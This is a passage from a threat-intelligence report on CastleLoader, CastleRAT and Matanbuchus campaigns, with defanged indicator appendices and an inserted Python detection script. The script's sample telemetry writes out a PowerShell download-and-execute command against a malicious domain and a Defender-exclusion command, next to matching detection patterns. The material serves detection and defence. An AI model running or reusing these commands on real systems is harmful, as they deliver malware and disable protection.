Lastly, they launched\r\nbroader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved\r\nGoogle Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote\r\nshare, leading to malware installation.\r\nWhile Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and\r\npartially overlapping tactics, particularly the use of DAT Freight \u0026 Analytics and Loadlink, suggest a possible connection\r\nbetween this activity cluster and Cluster 1 (this is a low-confidence assessment).\r\nNotably, in November 2025, Proofpoint reported again on possibly related activity in which cybercriminals targeted trucking\r\nand logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or\r\ncompromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing\r\nconvergence of cyber and physical cargo theft as criminals exploit digital logistics systems.\r\nCluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161\r\nCluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The\r\ncluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers\r\nCastleLoader, alongside other payloads, most notably Matanbuchus.\r\nEvidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. 
Furthermore, Insikt Group\r\nidentified previously unreported phishing email management tooling, which appears to be used by threat actors linked to\r\nCluster 2.\r\nMatanbuchus Activity and Booking.com-Themed Infrastructure\r\nAlongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns\r\nassociated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an\r\nearlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see\r\nFigure 16).\r\nFigure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)\r\nMatanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part\r\nfostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and\r\nimproved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing\r\ntiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the\r\nDNS-based version.\r\nRecorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2\r\nserver at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA;\r\nAS211059). 
This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec.\r\nHistorical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and\r\nnimbusvaults[.]com.\r\nAdditional Booking.com-Themed Infrastructure\r\nBy analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity,\r\nInsikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These\r\nnetwork indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.\r\nPhishing Email Management Tooling\r\nBy analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out because\r\neach hosted three previously unreported websites or management panels operating on high ports. The panels featured the\r\nfollowing HTML titles: “Менеджер Email” (“Email Manager”), “Менеджер Редиректов и рассылок” (“Redirect and Mailing Manager”), and “Менеджер Редиректов и Email”\r\n(“Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic\r\nfocus, Insikt Group assesses that these websites are used in tandem as part of campaigns that impersonate Booking.com.\r\nWebsite 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)\r\nThe first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email\r\ncampaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within\r\na single dashboard. 
The design, terminology, and functionality closely align with those typically observed in malspam or\r\nphishing infrastructure management panels.\r\nFigure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)\r\nWithin the document object model (DOM) of the website, Insikt Group identified two email addresses, one of which is\r\nlikely a compromised account used to send phishing emails. At the time of discovery, the other, a Rambler email address and likely\r\na burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the\r\nprimary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or\r\nspam distribution. The DOM also contained an AWS access key.\r\nAdditionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly\r\nidentified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]”\r\n(translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown\r\nin Appendix E.\r\nWebsite 2: Email Manager (“Менеджер Email”)\r\nThe second website, hosted on port 56724, closely resembles the first “Redirect and Email Manager” panel but exhibits\r\nseveral notable configuration differences (see Figure 18). 
These include a distinct AWS username, an SMTP sender address,\r\nbred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise.\r\nFurthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.\r\nFigure 18: Page linked to “Email Manager” tool (Source: Recorded Future)\r\nWebsite 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)\r\nThe third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator\r\nand mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection,\r\nsubdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target\r\nfile uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and\r\nstatistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format\r\n[identifier].[base_name].[main_domain]. Because every recipient receives a link with its own leftmost label, the scheme is typically served by a wildcard DNS record under [base_name].[main_domain], and it shows up in passive DNS or proxy logs as many previously unseen labels under a single parent, which is a useful hunting signal.\r\nFigure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)\r\nThe domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within\r\nthe DOM.\r\nNotably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high\r\nports. 
The IP addresses are listed in Table 1.\r\nIP Address | Ports\r\n109[.]104[.]153[.]100 | 11599, 12305, 13267, 13275\r\n109[.]104[.]153[.]193 | 10324, 10616, 14195, 14196\r\n109[.]104[.]153[.]29 | 13413, 14900\r\n109[.]104[.]154[.]67 | 11264, 11860, 14100, 14122\r\nTable 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)\r\nInsikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.\r\nIP Address | ASN | Notes\r\n85[.]208[.]84[.]65 | STIMUL-AS, RU (AS211659) | Certificate subject common name: guesitastayhotel[.]com. CastleRAT and Matanbuchus C2 servers identified within the same /24 range (85[.]208[.]84[.]115 and 85[.]208[.]84[.]242, respectively)\r\n80[.]64[.]18[.]245 | STIMUL-AS, RU (AS211659) | Hosts hotel-themed domains\r\n185[.]39[.]19[.]94 | OPTIMA-AS, RU (AS216341) | Certificate subject common name: guesitastayhotel[.]com\r\n88[.]214[.]50[.]83 | OPTIMA-AS, RU (AS216341) | Suspected testing server due to the number of domains including the keywords “test” and “demo”\r\nTable 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)\r\nASN Cluster Possibly Linked to Bearhost\r\nInsikt Group observed significant infrastructure activity associated with AS211659 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. 
According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, and MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.\r\nInfrastructure Similarities with TAG-157 (RefBroker)\r\nInsikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, which is part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.\r\nCluster 3: Booking.com Impersonation Activity\r\nCluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. 
Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.\r\nInfrastructure Analysis\r\nInsikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add a Windows Defender exclusion for the eventual payload (update.exe). Because adding an exclusion requires elevation, the loop floods the user with User Account Control (UAC) prompts until one is accepted; the same loop also frustrates analysis sandboxes and security controls. Once the exclusion is applied, the loader decrypts and launches the payload (update.exe), which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile; Appendix F lists this profile and domain among the CastleRAT C2s. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for dead drops may also contain a hard-coded backup C2 in case the dead drop C2 retrieval fails. A list of all observed Steam Community profiles and the C2 domains observed on each is found in Appendix F.\r\nFigure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)\r\nAt the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 suggests that the operators acquired these IP addresses around the same time and that the hosting provider, Global Connectivity Solutions (AS215540), assigned them sequentially. 
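The Cluster 3 chain described above, as an added example that is not part of the original report and not Recorded Future’s tooling: a Python triage pass over constructed endpoint and proxy telemetry that (a) flags the ClickFix PowerShell cradle, (b) flags the burst of Add-MpPreference exclusion spawns from one parent that the UAC-prompt loop produces, and (c) refangs the indicators printed in this section and in Appendix H (the `[.]` and `hxxps[://]` notation) so they can be matched against DNS queries and proxy URLs, which is the first step of the Mitigations section. The event field names, the `loader.exe` image name, the exclusion path, the thresholds, and every sample event are assumptions made for this example.

```python
"""Triage of constructed endpoint telemetry for the Cluster 3 ClickFix chain.

Added example; not Recorded Future's tooling and not taken from the report.
Assumptions: events are dicts in a Sysmon-like shape (type/ts/pid/ppid/image/
cmdline for process creates, type/ts/query for DNS, type/ts/url for proxy
logs); the loader image name, the exclusion path and the thresholds are
illustrative. The sample events below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators as printed in the report (defanged), plus one Appendix F profile.
DEFANGED_IOCS = [
    "update-info4468765[.]com",
    "boiksal[.]com",
    "programsbookss[.]com",
    "justnewdmain[.]com",
    "hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3",
]


def refang(ioc: str) -> str:
    """Reverse the report's defanging: [.] -> . and hxxp(s)[://] -> http(s)://."""
    s = ioc.replace("[.]", ".").replace("[://]", "://")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)
    return s.lower()


def _host(s: str) -> str:
    """Hostname part of a URL, or the string itself for a bare domain."""
    return s.split("://", 1)[-1].split("/", 1)[0]


REFANGED = {refang(i) for i in DEFANGED_IOCS}
IOC_URLS = {i for i in REFANGED if "://" in i}
# Bare domains only: steamcommunity.com itself is a legitimate service, so the
# dead-drop profile is matched on its full URL, never on the hostname.
IOC_HOSTS = {i for i in REFANGED if "://" not in i}

# ClickFix one-liners both fetch remote content and execute it in one command.
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process)\b|\|\s*&", re.I)
EXCLUSION = re.compile(r"add-mppreference\s+-exclusionpath\b", re.I)


def is_clickfix_cradle(ev: dict) -> bool:
    """Process create for PowerShell whose command line both downloads and executes."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return False
    return bool(DOWNLOAD.search(ev["cmdline"]) and EXECUTE.search(ev["cmdline"]))


def exclusion_flood(events, window=timedelta(seconds=60), threshold=3) -> dict:
    """Parent pids that spawn >= threshold Defender-exclusion commands inside window.

    One Add-MpPreference is ordinary admin work; a burst from a single parent is
    the UAC-prompt loop the .NET loader runs until a prompt is accepted.
    """
    by_parent = defaultdict(list)
    for ev in events:
        if ev["type"] == "process" and EXCLUSION.search(ev["cmdline"]):
            by_parent[ev["ppid"]].append(ev["ts"])
    hits = {}
    for ppid, times in by_parent.items():
        times.sort()
        for i in range(len(times) - threshold + 1):  # sliding window over spawn times
            if times[i + threshold - 1] - times[i] <= window:
                hits[ppid] = len(times)
                break
    return hits


def ioc_matches(events) -> list:
    """DNS queries and proxy URLs that hit a refanged indicator, in event order."""
    hits = []
    for ev in events:
        if ev["type"] == "dns" and ev["query"].lower().rstrip(".") in IOC_HOSTS:
            hits.append(("dns", ev["query"]))
        elif ev["type"] == "http":
            url = ev["url"].lower()
            if url in IOC_URLS or _host(url) in IOC_HOSTS:
                hits.append(("http", ev["url"]))
    return hits


def triage(events) -> dict:
    """Run all three checks and return the findings keyed by check."""
    return {
        "cradle_pids": [e["pid"] for e in events if e["type"] == "process" and is_clickfix_cradle(e)],
        "exclusion_flood": exclusion_flood(events),
        "ioc_hits": ioc_matches(events),
    }


# Constructed sample telemetry mirroring the chain: ClickFix cradle -> loader ->
# repeated exclusion attempts -> Steam profile fetch -> C2 DNS lookup.
_T0 = datetime(2025, 9, 5, 10, 0, 0)


def _t(seconds: int) -> datetime:
    return _T0 + timedelta(seconds=seconds)


SAMPLE_EVENTS = [
    {"type": "process", "ts": _t(0), "pid": 4100, "ppid": 3000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr -UseBasicParsing http://boiksal.com/upd)"'},
    {"type": "dns", "ts": _t(1), "query": "boiksal.com"},
    {"type": "process", "ts": _t(5), "pid": 4200, "ppid": 4100, "image": "loader.exe", "cmdline": "loader.exe"},
] + [
    {"type": "process", "ts": _t(6 + 2 * i), "pid": 4300 + i, "ppid": 4200, "image": "powershell.exe",
     "cmdline": r'powershell -c "Add-MpPreference -ExclusionPath C:\Users\Public\update.exe"'}
    for i in range(5)
] + [
    {"type": "http", "ts": _t(20), "url": "https://steamcommunity.com/id/krouvhsin34287f7h3"},
    {"type": "dns", "ts": _t(21), "query": "programsbookss.com"},
    {"type": "dns", "ts": _t(22), "query": "www.example.com"},  # benign noise
    {"type": "process", "ts": _t(30), "pid": 5000, "ppid": 3000, "image": "powershell.exe",
     "cmdline": 'powershell -c "Add-MpPreference -ExclusionPath D:\\build"'},  # lone admin action, not flagged
]

if __name__ == "__main__":
    for key, val in triage(SAMPLE_EVENTS).items():
        print(f"{key}: {val}")
```

On the sample above the cradle check returns pid 4100, the exclusion check returns the loader (pid 4200) with five spawns, and the indicator check returns the boiksal[.]com lookup, the Steam profile URL, and the programsbookss[.]com lookup while ignoring the single Add-MpPreference from an unrelated parent. The Steam hostname is deliberately kept out of the host set; matching it would flag every Steam user, which is why the report’s advice is to flag unusual legitimate internet services rather than block them outright.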
A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.\r\nFigure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)\r\nWhen scanned, the Booking.com-themed domains typically return either a Cloudflare-themed Turnstile page or a “turnstile token missing” error message (1, 2). Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of them ultimately resolve to threat actor–controlled IP addresses.\r\nCluster 4: Malvertising and Fake Software\r\nCluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.\r\nBased on Insikt Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. 
Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.\r\nThe CastleLoader payloads are distributed through fake GitHub repositories and delivered as digitally signed MSI installers, often bearing Extended Validation (EV) code-signing certificates, similar to those observed in previous Bumblebee campaigns. These signed builds carry certificates issued to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, was active in discussions regarding EV certificates earlier this year.\r\nPossible Connection to Exploit Forum User Sparja\r\nAnalysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle”, this instance returned the title “Sparja”. Review of the panel’s DOM revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it may indicate code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. 
Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).\r\nFigure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)\r\nActivity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Based on data obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.\r\nOn December 22, 2024, Sparja authored a thread on Exploit Forum looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely that ppro was involved in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing dropper or loader functionality consistent with CastleLoader’s purpose.\r\nFigure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)\r\nForum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. 
This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.\r\nFigure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)\r\nA related CastleLoader sample, distributed as an MSI installer, was identified in MalwareBazaar (abuse.ch) data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat-actor campaigns.\r\nThe available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.\r\nOn October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. 
This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also places Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the Black Basta ransomware group. Tramp was also an affiliate of several ransomware operations, such as REvil and Conti, and maintained close ties with Rhysida and Cactus. While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.\r\nVictimology\r\nInsikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that for the entities Insikt Group did identify, the infection might have occurred on an individual, unmanaged machine inside the victim organization’s network or on its WiFi, rather than on the organization’s own systems. 
For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university’s network.\r\nMitigations\r\nLeverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.\r\nMonitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.\r\nLeverage the Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.\r\nUse Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.\r\nUse the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.\r\nUse Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. 
For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.\r\nOutlook\r\nAs anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.\r\nAmong observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. 
This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.\r\nInsikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.\r\nAppendix A: CastleLoader C2 Servers\r\nDomain IP Address First Seen\r\nicantseeyou[.]icu 80[.]77[.]25[.]239 2025-10-09\r\nanotherproject[.]icu 45[.]11[.]183[.]165 2025-10-09\r\ndonttouchthisisuseless[.]icu 80[.]77[.]25[.]88 2025-10-09\r\noldspicenotsogood[.]shop 45[.]155[.]249[.]121 2025-09-22\r\ndoyoureallyseeme[.]icu 45[.]11[.]183[.]19 2025-10-31\r\ntouchmeplease[.]icu 45[.]11[.]183[.]45 2025-10-31\r\ndonttouchme[.]life 80[.]77[.]25[.]114 2025-10-31\r\nwereatwar[.]com 172[.]86[.]90[.]58 2025-11-05\r\nrcpeformse[.]com 147[.]45[.]177[.]127 2025-11-05\r\nroject0[.]com 185[.]121[.]234[.]141 2025-11-03\r\nbethschwier[.]com 170[.]130[.]165[.]201 2025-10-12\r\nspeatly[.]com 173[.]44[.]141[.]52 2025-11-06\r\ncampanyasoft[.]com 31[.]58[.]87[.]132 2025-10-02\r\nalafair[.]net 107[.]158[.]128[.]26 2025-09-06\r\ndpeformse[.]com 147[.]45[.]177[.]127 2025-10-29\r\ncastlppwnd[.]com 31[.]58[.]50[.]160 2025-11-05\r\n(Source: Recorded Future)\r\nAppendix B: Additional Infrastructure Likely Linked to CastleLoader\r\nDomain IP Address\r\nalbafood[.]shop 15[.]197[.]240[.]20\r\nalbalk[.]lol 15[.]197[.]240[.]20\r\nbdeskthebest[.]shop 15[.]197[.]240[.]20\r\nbestproxysale[.]shop 15[.]197[.]240[.]20\r\nbestvpninfo[.]shop 15[.]197[.]240[.]20\r\nchessinthenight[.]lol 15[.]197[.]240[.]20\r\nclgenetics[.]shop 15[.]197[.]240[.]20\r\ndocusign[.]homes 15[.]197[.]240[.]20\r\ndubaialbafood[.]shop 15[.]197[.]240[.]20\r\neasyadvicesforyou[.]shop 
15[.]197[.]240[.]20\r\neasyprintscreen[.]shop 15[.]197[.]240[.]20\r\nfunjobcollins[.]shop 31[.]214[.]157[.]77\r\nnort-secure[.]shop 15[.]197[.]240[.]20\r\nnorton-secure[.]shop 15[.]197[.]240[.]20\r\nnotstablecoin[.]xyz 15[.]197[.]240[.]20\r\nnotusdt[.]lol 15[.]197[.]240[.]20\r\nnvidblog[.]shop 15[.]197[.]240[.]20\r\nnvldlainfoblog[.]shop 15[.]197[.]240[.]20\r\noldspicenotsogood[.]shop 45[.]155[.]249[.]121\r\nstarkforeveryone[.]lol 15[.]197[.]240[.]20\r\nsweetdevices[.]lol 15[.]197[.]240[.]20\r\ntestdomain123123[.]shop 15[.]197[.]240[.]20\r\ntradeviewdesktop[.]shop 15[.]197[.]240[.]20\r\ntradlngview-desktop[.]biz 15[.]197[.]240[.]20\r\ntradlngvlewdesktop[.]shop 15[.]197[.]240[.]20\r\ntradview-desktop[.]shop 15[.]197[.]240[.]20\r\nvipcinemade[.]shop 15[.]197[.]240[.]20\r\nvipcinemadubai[.]shop 15[.]197[.]240[.]20\r\nvipdubaicinema[.]shop 15[.]197[.]240[.]20\r\n(Source: Recorded Future)\r\nAppendix C: Logistics-Themed Infrastructure Used by TAG-160\r\nDomain IP Address First Seen Last Seen\r\nloadsschedule[.]com 199[.]79[.]62[.]141 2025-08-04 2025-11-09\r\nloadstracking[.]com Cloudflare 2025-09-19 2025-11-09\r\nloadstrucking[.]com 162[.]251[.]80[.]108 2025-05-18 2025-09-10\r\nrateconfirmations[.]com 162[.]215[.]230[.]150 2025-09-11 2025-11-09\r\ncdlfreightlogistics[.]com N/A N/A N/A\r\ndperforms[.]info 78[.]153[.]155[.]131 2025-10-01 2025-11-09\r\nenglandloglstics[.]com N/A N/A N/A\r\nenglanglogistlcs[.]com N/A N/A N/A\r\nloadstracking[.]com 207[.]174[.]212[.]141 2025-06-27 N/A\r\nhometownlogisticsllc[.]com N/A N/A N/A\r\nleemanlogisticsinc[.]com N/A N/A N/A\r\nloadplannig[.]com 204[.]11[.]58[.]80 2025-07-27 2025-11-09\r\nloads[.]icu 
185[.]236[.]20[.]154 2025-09-17 2025-11-10\r\nloadsplanning[.]com 192[.]124[.]178[.]74 2025-07-26 2025-07-26\r\nloadsschedule[.]com 199[.]79[.]62[.]141 2025-08-04 2025-11-09\r\nloadstracking[.]com 207[.]174[.]212[.]141 2025-06-28 2025-07-03\r\nloadstrucking[.]com 162[.]251[.]80[.]108 2025-05-18 2025-09-10\r\nmcentireinc[.]com N/A N/A N/A\r\nmcloads[.]com 74[.]119[.]239[.]234 2025-04-18 2025-05-15\r\nmlxfreightinc[.]com N/A N/A N/A\r\nmrlogsol[.]ca N/A N/A N/A\r\npinaccletruckllc[.]com 74[.]119[.]239[.]234 2025-04-12 2025-05-14\r\nrateconfirmations[.]com 162[.]215[.]230[.]150 2025-09-11 2025-11-09\r\nredlightninglogistics[.]com Cloudflare 2025-03-21 2025-11-10\r\nredlightninglogisticsinc[.]com 74[.]119[.]239[.]234 2025-04-19 2025-05-13\r\nstarshiplogisticsgroupllc[.]com N/A N/A N/A\r\ntenderloads[.]com 162[.]215[.]241[.]215 2025-10-24 2025-11-09\r\ntenderloads[.]com 162[.]215[.]241[.]46 2025-09-11 2025-10-23\r\ntrucksscheduling[.]com 162[.]215[.]230[.]96 2025-08-18 2025-11-10\r\n(Source: Recorded Future)\r\nAppendix D: Booking.com-Themed Domains Linked to TAG-161\r\nDomain IP Address First Seen Last Seen\r\ncheckinastayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\ncheckinistayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-17\r\ncheckinstayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\ncheckistayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-22\r\nchecksstayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-23\r\ncheckystayverify[.]com 185[.]39[.]19[.]180 2025-07-31 